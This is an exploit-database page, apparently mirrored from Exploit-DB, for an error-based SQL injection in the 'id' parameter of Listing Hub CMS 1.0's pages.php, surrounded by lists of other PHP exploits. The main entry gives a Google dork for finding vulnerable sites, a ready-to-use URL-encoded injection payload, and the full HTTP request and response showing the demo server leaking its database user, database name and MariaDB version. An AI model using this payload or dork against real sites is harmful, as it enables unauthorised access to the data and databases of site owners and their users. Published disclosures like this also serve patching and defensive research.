Menu

Improved exploit search engine. Try python and hit enter

"Listing Hub CMS 1.0 - 'pages.php id' SQL Injection"

Author

"Deyaa Muhammad"

Platform

php

Release date

2019-02-19

Release Date Title Type Platform Author
2019-03-18 "TheCarProject v2 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-15 "Moodle 3.4.1 - Remote Code Execution" webapps php "Darryn Ten"
2019-03-15 "Laundry CMS - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-15 "ICE HRM 23.0 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload" webapps php "Daniele Scanu"
2019-03-14 "Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution" webapps php R3zk0n
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
2019-03-13 "WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-12 "PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)" webapps php "Gionathan Reale"
2019-03-11 "Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution" webapps php redtimmysec
2019-03-08 "DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery" webapps php ManhNho
2019-12-12 "phpBB 3.2.3 - Remote Code Execution" webapps php allyshka
2019-03-01 "WordPress Core 5.0 - Remote Code Execution" webapps php allyshka
2019-03-07 "Kados R10 GreenBee - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-05 "OpenDocMan 1.3.4 - 'search.php where' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-04 "WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities" webapps php ed0x21son
2019-03-04 "Craft CMS 3.1.12 Pro - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2019-03-04 "Bolt CMS 3.6.4 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2019-03-04 "elFinder 2.1.47 - Command Injection vulnerability in the PHP connector" webapps php q3rv0
2019-03-04 "CMSsite 1.0 - Multiple Cross-Site Request Forgery" webapps php "Mr Winst0n"
2019-03-04 "OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery" webapps php "Mr Winst0n"
2019-03-04 "OOP CMS BLOG 1.0 - Multiple SQL Injection" webapps php "Mr Winst0n"
2019-03-04 "Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-03-04 "zzzphp CMS 1.6.1 - Cross-Site Request Forgery" webapps php "Yang Chenglong"
2019-02-28 "Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Joomla! Component J2Store < 3.3.7 - SQL Injection" webapps php "Andrei Conache"
Release Date Title Type Platform Author
2019-02-19 "Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting" webapps php "Deyaa Muhammad"
2019-02-19 "Listing Hub CMS 1.0 - 'pages.php id' SQL Injection" webapps php "Deyaa Muhammad"
2019-02-19 "Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection" webapps php "Deyaa Muhammad"
2019-01-07 "All in One Video Downloader 1.2 - Authenticated SQL Injection" webapps php "Deyaa Muhammad"
2019-01-07 "Embed Video Scripts - Persistent Cross-Site Scripting" webapps php "Deyaa Muhammad"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46419/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection
# Google Dork: inurl:"pages.php?title=privacy-policy"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294
# Demo Website: https://listing-hub.themerig.com
# Version: 1.0
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
----------------------
Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability.

# POC:
----------------------
1. Access the following path https://[PATH]/pages.php?title=privacy-policy&id=2
2. You can perform an " error-based" SQL Injection using the payload below
2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20-

# Request:
----------------------
GET /pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- HTTP/1.1
Accept-Encoding: gzip, deflate
Host: server
Accept: */*
Connection: close
Cache-Control: no-cache


# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=icrk7uvmqmpsmb4ndt56me8564; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 1149
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 06:16:21 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="eng">
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="robots" content="index,follow"><br />
<b>Notice</b>:  Undefined index: title in <b>/home2/otomati5/server/includes/head.php</b> on line <b>71</b><br />
<br />
<b>Warning</b>:  PDO::query(): SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '::otomati5_hub@localhost::otomati5_hub::10.1.37-MariaDB-cll-lve:' for key 'group_key' in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />
<br />
<b>Fatal error</b>:  Call to a member function fetch() on boolean in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />